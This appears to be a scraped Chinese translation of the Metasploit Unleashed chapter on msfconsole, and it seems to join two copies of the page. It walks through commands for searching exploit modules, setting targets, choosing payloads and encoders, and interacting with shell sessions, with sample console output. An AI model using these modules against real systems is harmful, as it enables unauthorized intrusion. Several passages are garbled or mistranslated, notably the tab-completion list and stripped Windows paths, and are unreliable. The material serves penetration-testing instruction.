    exploit/windows/fileformat/feeddemon_opml 2009-02-09 great FeedDemon Stack Buffer Overflow

    exploit/windows/fileformat/foxit_title_bof 2010-11-13 great Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow

    exploit/windows/fileformat/ideal_migration_ipj 2009-12-05 great PointDev IDEAL Migration Buffer Overflow

    exploit/windows/fileformat/millenium_mp3_pls 2009-07-30 great Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow

    exploit/windows/fileformat/somplplayer_m3u 2010-01-22 great S.O.M.P.L 1.0 Player Buffer Overflow

    exploit/windows/fileformat/varicad_dwb 2010-03-17 great VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow

    exploit/windows/fileformat/wm_downloader_m3u 2010-07-28 normal WM Downloader 3.1.2.2 Buffer Overflow

    exploit/windows/ftp/trellian_client_pasv 2010-04-11 normal Trellian FTP Client 3.01 PASV Remote Buffer Overflow

    exploit/windows/ftp/xftp_client_pwd 2010-04-22 normal Xftp FTP Client 3.0 PWD Remote Buffer Overflow

    exploit/windows/misc/eureka_mail_err 2009-10-22 normal Eureka Email 2.2q ERR Remote Buffer Overflow

    exploit/windows/misc/hp_omniinet_4 2011-06-29 good HP OmniInet.exe Opcode 20 Buffer Overflow

    exploit/windows/misc/nettransport 2010-01-02 normal NetTransport Download Manager 2.90.510 Buffer Overflow

    exploit/windows/misc/ufo_ai 2009-10-28 average UFO: Alien Invasion IRC Client Buffer Overflow

    multiple

    您还可以将multiple关键字组合在一起以进一步缩小返回的结果。

    msf > search cve:2011 author:jduck platform:linux

    Matching Modules

    ================

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    exploit/linux/misc/netsupport_manager_agent 2011-01-08 average NetSupport Manager Agent Remote Buffer Overflow

    sessions

    该sessions命令可以列出,互动,并杀死催生了sessions。sessions可以是shell,Meterpreter会话,VNC等。

    msf > sessions -h用法: sessions [选项] 或 sessions [ID] 描述: 活动的会话操作和交互。 选项: -C 对使用-i或全部给定的会话运行Meterpreter命令 -K 终止所有会话 -c 在由-i或全部给定的会话上运行命令 -h 帮助横幅 -i 与提供的会话ID进行交互 -k 按会话ID和/或范围终止会话 -l 列出所有活动会话 -q 安静模式 -r 重置用-i或全部给定的会话的环形缓冲区 -s 在与-i或全部给定的会话上运行脚本 -t 设置响应超时(默认值:15) -u 在许多平台上将shell升级到meterpreter会话 -v 以详细模式列出会话 -x 在会话表中显示扩展信息 许多选项允许使用逗号和破折号指定会话范围。 例如: sessions -s checkvm -i 1,3-5 或者 sessions -k 1-2,5,6

    要列出任何活动会话,请将 -l选项传递给sessions。

    msf exploit(3proxy) > sessions -l

    Active sessions

    ===============

    Id Description Tunnel

    -- ----------- ------

    1 Command shell 192.168.1.101:33191 -> 192.168.1.104:4444

    要与给定的会话进行交互,只需使用' -i'开关,然后使用sessions的Id号码。

    msf exploit(3proxy) > sessions -i 1

    [*] Starting interaction with 1...

    C:WINDOWSsystem32>

    set

    该set命令允许您配置框架选项和参数为你正在使用的当前模块。

    msf auxiliary(ms09_050_smb2_negotiate_func_index) > set RHOST 172.16.194.134

    RHOST => 172.16.194.134

    msf auxiliary(ms09_050_smb2_negotiate_func_index) > show options

    Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST 172.16.194.134 yes The target address

    RPORT 445 yes The target port

    WAIT 180 yes The number of seconds to wait for the attack to complete.

    Exploit target:

    Id Name

    -- ----

    0 Windows Vista SP1/SP2 and Server 2008 (x86)

    Metasploit还允许您设置“encoder(编码器)”以在运行时使用。如果您不确定哪种“payload(有效负载”)编码方法适用于给定的漏洞攻击,那么这对于攻击开发尤其有用。

    msf exploit(ms09_050_smb2_negotiate_func_index) > show encoders

    Compatible Encoders

    ===================

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    generic/eicar manual The EICAR Encoder

    generic/none normal The "none" Encoder

    x86/add_sub manual Add/Sub Encoder

    x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder

    x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder

    x86/avoid_underscore_tolower manual Avoid underscore/tolower

    x86/avoid_utf8_tolower manual Avoid UTF8/tolower

    x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder

    x86/bmp_polyglot manual BMP Polyglot

    x86/call4_dword_xor normal Call+4 Dword XOR Encoder

    x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder

    x86/context_stat manual stat(2)-based Context Keyed Payload Encoder

    x86/context_time manual time(2)-based Context Keyed Payload Encoder

    x86/countdown normal Single-byte XOR Countdown Encoder

    x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder

    x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder

    x86/nonalpha low Non-Alpha Encoder

    x86/nonupper low Non-Upper Encoder

    x86/opt_sub manual Sub Encoder (optimised)

    x86/service manual Register Service

    x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder

    x86/single_static_bit manual Single Static Bit

    x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder

    x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

    unset

    当然,set命令的相反部分是unset的。unset会删除以前使用set进行配置的参数。您可以全部取消全部删除所有分配的变量。

    msf > set RHOSTS 192.168.1.0/24

    RHOSTS => 192.168.1.0/24

    msf > set THREADS 50

    THREADS => 50

    msf > set

    Global

    ======

    Name Value

    ---- -----

    RHOSTS 192.168.1.0/24

    THREADS 50

    msf > unset THREADS

    Unsetting THREADS...

    msf > unset all

    Flushing datastore...

    msf > set

    Global

    ======

    No entries in data store.

    setg

    为了在pentest中节省大量输入,可以在msfconsole中设置全局变量。你可以用setg命令来做到这一点。一旦这些设置完成,您就可以在任意多个漏洞利用和辅助模块中使用它们。您也可以将它们保存下次启动msfconsole时使用。然而,陷阱是忘记了你已经保存了全局变量,所以在运行或利用之前总是检查你的选项。相反,您可以使用unsetg命令取消设置全局变量。在下面的例子中,变量以全部大写形式输入(即:LHOST),但Metasploit不区分大小写,因此没有必要这样做。

    msf> setg LHOST 192.168.1.101

    LHOST => 192.168.1.101

    msf> setg RHOSTS 192.168.1.0/24

    RHOSTS => 192.168.1.0/24

    msf> setg RHOST 192.168.1.136

    RHOST => 192.168.1.136

    设置完不同的变量后,您可以运行save命令来保存当前的环境和设置。保存设置后,它们将在启动时自动加载,这样就不必再次设置所有内容。

    msf > save

    Saved configuration to: /root/.msf4/config

    msf >

    show

    在msfconsole提示符下输入show会显示Metasploit中的每个模块。

    msf > show

    Encoders

    ========

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    cmd/generic_sh good Generic Shell Variable Substitution Command Encoder

    cmd/ifs low Generic ${IFS} Substitution Command Encoder

    cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder

    ...略...

    您可以使用许多show命令,但您最常使用的命令是:show auxiliary, show exploits, show payloads, show encoders 和 show nops.

    auxiliary

    执行show exploits将显示Metasploit中所有可用辅助模块的列表。如前所述,辅助模块包括扫描器,拒绝服务模块,模糊器等。

    msf > show auxiliary

    Auxiliary

    =========

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    admin/2wire/xslt_password_reset 2007-08-15 normal 2Wire Cross-Site Request Forgery Password Reset Vulnerability

    admin/backupexec/dump normal Veritas Backup Exec Windows Remote File Access

    admin/backupexec/registry normal Veritas Backup Exec Server Registry Access

    ...略...

    exploits

    自然,显示“exploits(漏洞利用)”将是你最感兴趣的命令,因为Metasploit的核心是关于漏洞。运行显示漏洞获取框架中包含的所有漏洞列表。

    msf > show exploits

    Exploits

    ========

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow

    aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)

    bsdi/softcart/mercantec_softcart 2004-08-19 great Mercantec SoftCart CGI Overflow

    ...略...

    MSFconsole Payloads

    运行显示Payloads将显示Metasploit中所有可用平台的所有不同Payloads。

    msf > show payloads

    Payloads

    ========

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline

    aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline

    aix/ppc/shell_interact normal AIX execve shell for inetd

    ...略...

    payloads

    正如你所看到的,有很多可用的payloads。幸运的是,当您处于特定漏洞利用的模块时,运行的show payload将仅显示与该漏洞兼容的payloads。

    例如,如果它是Windows漏洞利用,则不会显示Linux的“payloads(有效负载)”。

    msf exploit(ms08_067_netapi) > show payloads

    Compatible Payloads

    ===================

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    generic/custom normal Custom Payload

    generic/debug_trap normal Generic x86 Debug Trap

    generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline

    ...略...

    options

    如果您选择了特定模块,则可以发出show options命令来显示该特定模块可用和/或必需的设置。

    msf exploit(ms08_067_netapi) > show options

    Module options:

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST yes The target address

    RPORT 445 yes Set the SMB service port

    SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

    Exploit target:

    Id Name

    -- ----

    0 Automatic Targeting

    targets

    如果您不确定操作系统是否容易受到特定漏洞攻击,请在漏洞利用模块的上下文中运行show targets命令以查看哪些目标受支持。

    msf exploit(ms08_067_netapi) > show targets

    Exploit targets:

    Id Name

    -- ----

    0 Automatic Targeting

    1 Windows 2000 Universal

    10 Windows 2003 SP1 Japanese (NO NX)

    11 Windows 2003 SP2 English (NO NX)

    12 Windows 2003 SP2 English (NX)

    ...略...

    advanced

    如果您希望进一步微调漏洞,可以通过运行show advanced来查看更多高级选项。

    msf exploit(ms08_067_netapi) > show advanced

    Module advanced options (exploit/windows/smb/ms08_067_netapi):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    CHOST no The local client address

    CPORT no The local client port

    ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection

    ContextInformationFile no The information file that contains context information

    DCERPC::ReadTimeout 10 yes The number of seconds to wait for DCERPC responses

    DisablePayloadHandler false no Disable the handler code for the selected payload

    EnableContextEncoding false no Use transient context when encoding payloads

    NTLM::SendLM true yes Always send the LANMAN response (except when NTLMv2_session is specified)

    NTLM::SendNTLM true yes Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses

    NTLM::SendSPN true yes Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is required

    NTLM::UseLMKey false yes Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent

    NTLM::UseNTLM2_session true yes Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session

    NTLM::UseNTLMv2 true yes Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true

    Proxies no A proxy chain of format type:host:port[,type:host:port][...]

    SMB::ChunkSize 500 yes The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing

    SMB::Native_LM Windows 2000 5.0 yes The Native LM to send during authentication

    SMB::Native_OS Windows 2000 2195 yes The Native OS to send during authentication

    SMB::VerifySignature false yes Enforces client-side verification of server response signatures

    SMBDirect true no The target port is a raw SMB service (not NetBIOS)

    SMBDomain . no The Windows domain to use for authentication

    SMBName *SMBSERVER yes The NetBIOS hostname (required for port 139 connections)

    SMBPass no The password for the specified username

    SMBUser no The username to authenticate as

    SSL false no Negotiate SSL/TLS for outgoing connections

    SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"

    SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)

    SSLVersion Auto no Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, SSL2, SSL3, SSL23, TLS, TLS1, TLS1.1, TLS1.2)

    VERBOSE false no Enable detailed status messages

    WORKSPACE no Specify the workspace for this module

    WfsDelay 0 no Additional delay when waiting for a session

    encoders

    正在运行show encoders将显示MSF中可用“encoders(编码器)”的列表。

    msf > show encoders

    Encoders

    ========

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    cmd/echo good Echo Command Encoder

    cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder

    cmd/ifs low Generic ${IFS} Substitution Command Encoder

    cmd/perl normal Perl Command Encoder

    cmd/powershell_base64 excellent Powershell Base64 Command Encoder

    cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder

    generic/eicar manual The EICAR Encoder

    generic/none normal The "none" Encoder

    mipsbe/byte_xori normal Byte XORi Encoder

    mipsbe/longxor normal XOR Encoder

    mipsle/byte_xori normal Byte XORi Encoder

    mipsle/longxor normal XOR Encoder

    php/base64 great PHP Base64 Encoder

    ppc/longxor normal PPC LongXOR Encoder

    ppc/longxor_tag normal PPC LongXOR Encoder

    sparc/longxor_tag normal SPARC DWORD XOR Encoder

    x64/xor normal XOR Encoder

    x64/zutto_dekiru manual Zutto Dekiru

    x86/add_sub manual Add/Sub Encoder

    x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder

    x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder

    x86/avoid_underscore_tolower manual Avoid underscore/tolower

    x86/avoid_utf8_tolower manual Avoid UTF8/tolower

    x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder

    x86/bmp_polyglot manual BMP Polyglot

    x86/call4_dword_xor normal Call+4 Dword XOR Encoder

    x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder

    x86/context_stat manual stat(2)-based Context Keyed Payload Encoder

    x86/context_time manual time(2)-based Context Keyed Payload Encoder

    x86/countdown normal Single-byte XOR Countdown Encoder

    x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder

    x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder

    x86/nonalpha low Non-Alpha Encoder

    x86/nonupper low Non-Upper Encoder

    x86/opt_sub manual Sub Encoder (optimised)

    x86/service manual Register Service

    x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder

    x86/single_static_bit manual Single Static Bit

    x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder

    x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

    nops

    最后,运行 show nops命令将显示Metasploit必须提供的“NOP(空指令)”生成器。

    msf > show nops

    NOP Generators

    ==============

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    aarch64/simple normal Simple

    armle/simple normal Simple

    mipsbe/better normal Better

    php/generic normal PHP Nop Generator

    ppc/simple normal Simple

    sparc/random normal SPARC NOP Generator

    tty/generic normal TTY Nop Generator

    x64/simple normal Simple

    x86/opty2 normal Opty2

    x86/single_byte normal Single Byte

    use

    当您决定使用某个特定模块时,请发出use命令来选择它。在使用命令改变你的需要选择的模块,露出特定类型的命令。在下面的输出中注意,之前设置的全局变量已经被配置。

    msf > use dos/windows/smb/ms09_001_write

    msf auxiliary(ms09_001_write) > show options

    Module options:

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST yes The target address

    RPORT 445 yes Set the SMB service port

    msf auxiliary(ms09_001_write) >

    展开全文
  • 2. MSFconsole a)什么是 MSFconsoleMSFconsole可能是Metasploit Framework(MSF)最流行的接口。它提供了一个"一体式"集中式控制台,并允许你高效访问 MSF 中几乎所有可用的选项。MSFconsole 乍一看似乎...

    翻译者说明1:本文为Metasploit Unleashed中文版翻译。原文链接:https://www.offensive-security.com/metasploit-unleashed/

    翻译者说明2:为减轻翻译负担采用了机器翻译,翻译者从中人工剔除了机翻错误或歧义的问题,但难免会存在小问题,请读者见谅。如发现文章翻译存在问题,可在文章下方评论留言。

    翻译者说明3:如果你喜欢这篇翻译,请给关注一下我并给文章点个赞,你的支持是给我工作的最大鼓励。

    翻译者说明4:其他章节一并整合在专栏中,如有兴趣可关注专栏了解更多内容。

    四、METASPLOIT 基础

    2. MSFconsole

    msfconsole 帮助命令输出

    a)什么是 MSFconsole?

    MSFconsole可能是Metasploit Framework(MSF)最流行的接口。它提供了一个"一体式"集中式控制台,并允许你高效访问 MSF 中几乎所有可用的选项。MSFconsole 乍一看似乎令人生畏,但是一旦你学会了命令的语法,你就会学会欣赏利用这个接口的强大功能。

    b)使用 MSFconsole 的好处

    • 这是访问Metasploit中大多数功能的唯一受支持方式。
    • 为框架提供基于控制台的接口
    • 包含最多的功能,是最稳定的 MSF 接口
    • 完整的读行支持、选项卡和命令完成
    • 可以在 MSFconsole 中执行外部命令:
    msf > ping -c 1 192.168.1.100
    [*] exec: ping -c 1 192.168.1.100
    
    PING 192.168.1.100 (192.168.1.100) 56(84) bytes of data.
    64 bytes from 192.168.1.100: icmp_seq=1 ttl=128 time=10.3 ms
    
    --- 192.168.1.100 ping statistics ---
    1 packets transmitted, 1 received, 0% packet loss, time 0ms
    rtt min/avg/max/mdev = 10.308/10.308/10.308/0.000 ms
    msf >
    

    c)启动 MSFconsole

    MSFconsole 是通过从命令行运行 msfconsole 来启动的。MSFconsole 位于 /usr/share/metasploit-framework/msfconsole 目录中。
    -q 选项通过以安静模式启动 msfconsole 来删除启动横幅。

    root@kali:# msfconsole -q
    msf >
    

    d)如何使用命令提示符

    可以将 -h 传递给 msfconsole 以查看可用的其他用法选项。

    root@kali:~# msfconsole -h
    Usage: msfconsole [options]
    
    Common options
        -E, --environment ENVIRONMENT    The Rails environment. Will use RAIL_ENV environment variable if that is set.  Defaults to production if neither option not RAILS_ENV environment variable is set.
    
    Database options
        -M, --migration-path DIRECTORY   Specify a directory containing additional DB migrations
        -n, --no-database                Disable database support
        -y, --yaml PATH                  Specify a YAML file containing database settings
    
    Framework options
        -c FILE                          Load the specified configuration file
        -v, --version                    Show version
    
    Module options
            --defer-module-loads         Defer module loading unless explicitly asked.
        -m, --module-path DIRECTORY      An additional module path
    
    
    Console options:
        -a, --ask                        Ask before exiting Metasploit or accept 'exit -y'
        -d, --defanged                   Execute the console as defanged
        -L, --real-readline              Use the system Readline library instead of RbReadline
        -o, --output FILE                Output to the specified file
        -p, --plugin PLUGIN              Load a plugin on startup
        -q, --quiet                      Do not print the banner on startup
        -r, --resource FILE              Execute the specified resource file (- for stdin)
        -x, --execute-command COMMAND    Execute the specified string as console commands (use ; for multiples)
        -h, --help                       Show this message
    

    在 msf 命令提示符下输入help 后,将显示可用命令的列表以及这些命令的用途说明。

    msf > help
    
    Core Commands
    =============
    
        Command       Description
        -------       -----------
        ?             Help menu
        advanced      Displays advanced options for one or more modules
        back          Move back from the current context
        banner        Display an awesome metasploit banner
        cd            Change the current working directory
        color         Toggle color
        connect       Communicate with a host
        edit          Edit the current module with $VISUAL or $EDITOR
        exit          Exit the console
        get           Gets the value of a context-specific variable
        getg          Gets the value of a global variable
        grep          Grep the output of another command
        help          Help menu
        info          Displays information about one or more modules
        irb           Drop into irb scripting mode
        jobs          Displays and manages jobs
        kill          Kill a job
        load          Load a framework plugin
        loadpath      Searches for and loads modules from a path
        makerc        Save commands entered since start to a file
        options       Displays global options or for one or more modules
        popm          Pops the latest module off the stack and makes it active
        previous      Sets the previously loaded module as the current module
        pushm         Pushes the active or list of modules onto the module stack
        quit          Exit the console
        reload_all    Reloads all modules from all defined module paths
        rename_job    Rename a job
        resource      Run the commands stored in a file
        route         Route traffic through a session
        save          Saves the active datastores
        search        Searches module names and descriptions
        sessions      Dump session listings and display information about sessions
        set           Sets a context-specific variable to a value
        setg          Sets a global variable to a value
        show          Displays modules of a given type, or all modules
        sleep         Do nothing for the specified number of seconds
        spool         Write console output into a file as well the screen
        threads       View and manipulate background threads
        unload        Unload a framework plugin
        unset         Unsets one or more context-specific variables
        unsetg        Unsets one or more global variables
        use           Selects a module by name
        version       Show the framework and console library version numbers
    
    
    Database Backend Commands
    =========================
    
        Command           Description
        -------           -----------
        creds             List all credentials in the database
        db_connect        Connect to an existing database
        db_disconnect     Disconnect from the current database instance
        db_export         Export a file containing the contents of the database
        db_import         Import a scan result file (filetype will be auto-detected)
        db_nmap           Executes nmap and records the output automatically
        db_rebuild_cache  Rebuilds the database-stored module cache
        db_status         Show the current database status
        hosts             List all hosts in the database
        loot              List all loot in the database
        notes             List all notes in the database
        services          List all services in the database
        vulns             List all vulnerabilities in the database
        workspace         Switch between database workspaces
    
    

    e)Tab键完成

    MSFconsole 旨在快速使用,帮助实现此目标的功能之一是 Tab 键完成。由于可用的模块种类繁多,因此很难记住要使用的特定模块的确切名称和路径。与大多数其他shell一样,输入您知道的内容并按"Tab"将显示可用的选项列表,或者如果只有一个选项,则自动完成字符串。Tab 完成取决于 ruby readline 扩展,控制台中的几乎每个命令都支持 Tab 完成。

    • use exploit/windows/dce
    • 使用 .netapi.
    • 设置主机
    • 显示
    • 设置目标
    • 设置有效载荷窗口/外壳/
    • exp
    msf > use exploit/windows/smb/ms
    use exploit/windows/smb/ms03_049_netapi
    use exploit/windows/smb/ms04_007_killbill
    use exploit/windows/smb/ms04_011_lsass
    use exploit/windows/smb/ms04_031_netdde
    use exploit/windows/smb/ms05_039_pnp
    use exploit/windows/smb/ms06_025_rasmans_reg
    use exploit/windows/smb/ms06_025_rras
    use exploit/windows/smb/ms06_040_netapi
    use exploit/windows/smb/ms06_066_nwapi
    use exploit/windows/smb/ms06_066_nwwks
    use exploit/windows/smb/ms06_070_wkssvc
    use exploit/windows/smb/ms07_029_msdns_zonename
    use exploit/windows/smb/ms08_067_netapi
    use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
    use exploit/windows/smb/ms10_046_shortcut_icon_dllloader
    use exploit/windows/smb/ms10_061_spoolss
    use exploit/windows/smb/ms15_020_shortcut_icon_dllloader
    msf > use exploit/windows/smb/ms08_067_netapi
    

    MSFconsole是Metasploit最常用的接口。让自己熟悉这些msfconsole 命令将在整个课程中为您提供帮助,并为您提供使用Metasploit的坚实基础。

    f)MSFconsole 命令

    MSFconsole 有许多不同的命令选项可供选择。以下是一组核心的 Metasploit 命令及其输出。

    back          Move back from the current context
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    edit          Edit the current module with $VISUAL or $EDITOR
    exit          Exit the console
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    go_pro        Launch Metasploit web GUI
    
    grep          Grep the output of another command
    help          Help menu
    info          Displays information about one or more module
    irb           Drop into irb scripting mode
    jobs          Displays and manages jobs
    kill          Kill a job
    load          Load a framework plugin
    loadpath      Searches for and loads modules from a path
    makerc        Save commands entered since start to a file
    popm          Pops the latest module off the stack and makes it active
    
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    quit          Exit the console
    reload_all    Reloads all modules from all defined module paths
    rename_job    Rename a job
    resource      Run the commands stored in a file
    route         Route traffic through a session
    save          Saves the active datastores
    search        Searches module names and descriptions
    sessions      Dump session listings and display information about sessions
    
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    show          Displays modules of a given type, or all modules
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    use           Selects a module by name
    version       Show the framework and console library version numbers
    

    back 命令

    使用完特定模块后,或者无意中选择错误的模块后,可以发出 back 命令以移出当前上下文。但是,这不是必需的。就像在商用路由器中一样,您可以从其他模块中切换模块。提醒一下,变量只有在全局设置时才会结转。

    msf auxiliary(ms09_001_write) > back
    msf >
    

    banner 命令

    仅显示随机选择的banner。

    msf > banner
     _                                                    _
    /     /         __                         _   __  /_/ __
    | |  / | _____               ___   _____ | | /   _    
    | | /| | | ___ |- -|   /    / __ | -__/ | || | || | |- -|
    |_|   | | | _|__  | |_  / - __    | |    | | __/| |  | |_
          |/  |____/  ___/ / \___/   /     __|    |_  ___
    
    Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
    Metasploit Pro -- type 'go_pro' to launch it now.
    
           =[ metasploit v4.11.4-2015071402                  ]
    + -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
    + -- --=[ 432 payloads - 37 encoders - 8 nops             ]
    

    check 命令

    支持它的漏洞并不多,但还有一个检查选项,可以检查目标是否容易受到特定漏洞的攻击,而不是实际利用它。

    msf exploit(ms08_067_netapi) > show options
    
    Module options (exploit/windows/smb/ms08_067_netapi):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    172.16.194.134   yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting
    
    msf exploit(ms08_067_netapi) > check
    
    [*] Verifying vulnerable status... (path: 0x0000005a)
    [*] System is not vulnerable (status: 0x00000000)
    [*] The target is not exploitable.
    msf  exploit(ms08_067_netapi) >
    

    color 命令

    如果通过 msfconsole 获得的输出将包含颜色,则可以启用或禁用。

    msf > color
    Usage: color >'true'|'false'|'auto'>
    
    Enable or disable color output.
    

    connect 命令

    msfconsole 中内置了一个微型 Netcat 克隆,支持 SSL、代理、透视和文件传输。通过发出带有 IP 地址和端口号的连接命令,您可以从 msfconsole 中连接到远程主机,就像使用 Netcat 或 Telnet 一样。

    msf > connect 192.168.1.1 23
    [*] Connected to 192.168.1.1:23
    DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
    Release: 07/27/08 (SVN revision: 10011)
    DD-WRT login:
    

    您可以通过发出 -h 参数来查看所有其他选项。

    msf > connect -h
    Usage: connect [options]  
    
    Communicate with a host, similar to interacting via netcat, taking advantage of
    any configured session pivoting.
    
    OPTIONS:
    
        -C        Try to use CRLF for EOL sequence.
        -P <opt>  Specify source port.
        -S <opt>  Specify source address.
        -c <opt>  Specify which Comm to use.
        -h        Help banner.
        -i <opt>  Send the contents of a file.
        -p <opt>  List of proxies to use.
        -s        Connect with SSL.
        -u        Switch to a UDP socket.
        -w <opt>  Specify connect timeout.
        -z        Just try to connect, then return.
    
    msf >
    

    edit 命令

    edit命令将使用$ VISUAL或$ EDITOR编辑当前模块。默认情况下,这将在 Vim 中打开当前模块。

    msf exploit(ms10_061_spoolss) > edit
    [*] Launching /usr/bin/vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms10_061_spoolss.rb
    
    ##
    # This module requires Metasploit: http//metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'msf/core'
    require 'msf/windows_error'
    
    class Metasploit3 > Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::DCERPC
      include Msf::Exploit::Remote::SMB
      include Msf::Exploit::EXE
      include Msf::Exploit::WbemExec
    
      def initialize(info = {})
    

    exit 命令

    exit命令将仅退出 msfconsole。

    msf exploit(ms10_061_spoolss) > exit
    root@kali:~#
    

    grep 命令

    grep 命令类似于 Linux grep。它与来自另一个 msfconsole 命令输出的给定模式匹配。以下是使用 grep 匹配包含字符串"http"的输出的示例,该输出来自搜索包含字符串"oracle"的模块。

    msf > grep
    Usage: grep [options] pattern cmd
    
    Grep the results of a console command (similar to Linux grep command)
    
    OPTIONS:
    
        -A <opt&>  Show arg lines of output After a match.
        -B   Show arg lines of output Before a match.
        -c        Only print a count of matching lines.
        -h        Help banner.
        -i        Ignore case.
        -k   Keep (include) arg lines at start of output.
        -m   Stop after arg matches.
        -s   Skip arg lines of output before attempting match.
        -v        Invert match.
    msf >
    msf > grep http search oracle
       auxiliary/scanner/http/oracle_demantra_database_credentials_leak      2014-02-28       normal     Oracle Demantra Database Credentials Leak
       auxiliary/scanner/http/oracle_demantra_file_retrieval                 2014-02-28       normal     Oracle Demantra Arbitrary File Retrieval with Authentication Bypass
       auxiliary/scanner/http/oracle_ilom_login                                               normal     Oracle ILO Manager Login Brute Force Utility
       exploit/multi/http/glassfish_deployer                                 2011-08-04       excellent  Sun/Oracle GlassFish Server Authenticated Code Execution
       exploit/multi/http/oracle_ats_file_upload                             2016-01-20       excellent  Oracle ATS Arbitrary File Upload
       exploit/multi/http/oracle_reports_rce                                 2014-01-15       great      Oracle Forms and Reports Remote Code Execution
       exploit/windows/http/apache_chunked                                   2002-06-19       good       Apache Win32 Chunked Encoding
       exploit/windows/http/bea_weblogic_post_bof                            2008-07-17       great      Oracle Weblogic Apache Connector POST Request Buffer Overflow
       exploit/windows/http/oracle9i_xdb_pass                                2003-08-18       great      Oracle 9i XDB HTTP PASS Overflow (win32)
       exploit/windows/http/oracle_beehive_evaluation                        2010-06-09       excellent  Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability
       exploit/windows/http/oracle_beehive_prepareaudiotoplay                2015-11-10       excellent  Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload
       exploit/windows/http/oracle_btm_writetofile                           2012-08-07       excellent  Oracle Business Transaction Management FlashTunnelService Remote Code Execution
       exploit/windows/http/oracle_endeca_exec                               2013-07-16       excellent  Oracle Endeca Server Remote Command Execution
       exploit/windows/http/oracle_event_processing_upload                   2014-04-21       excellent  Oracle Event Processing FileUploadServlet Arbitrary File Upload
       exploit/windows/http/osb_uname_jlist                                  2010-07-13       excellent  Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
    

    help 命令

    help 命令将为您提供所有可用命令的列表和小描述。

    msf > help
    
    Core Commands
    =============
    
        Command       Description
        -------       -----------
        ?             Help menu
        banner        Display an awesome metasploit banner
        cd            Change the current working directory
        color         Toggle color
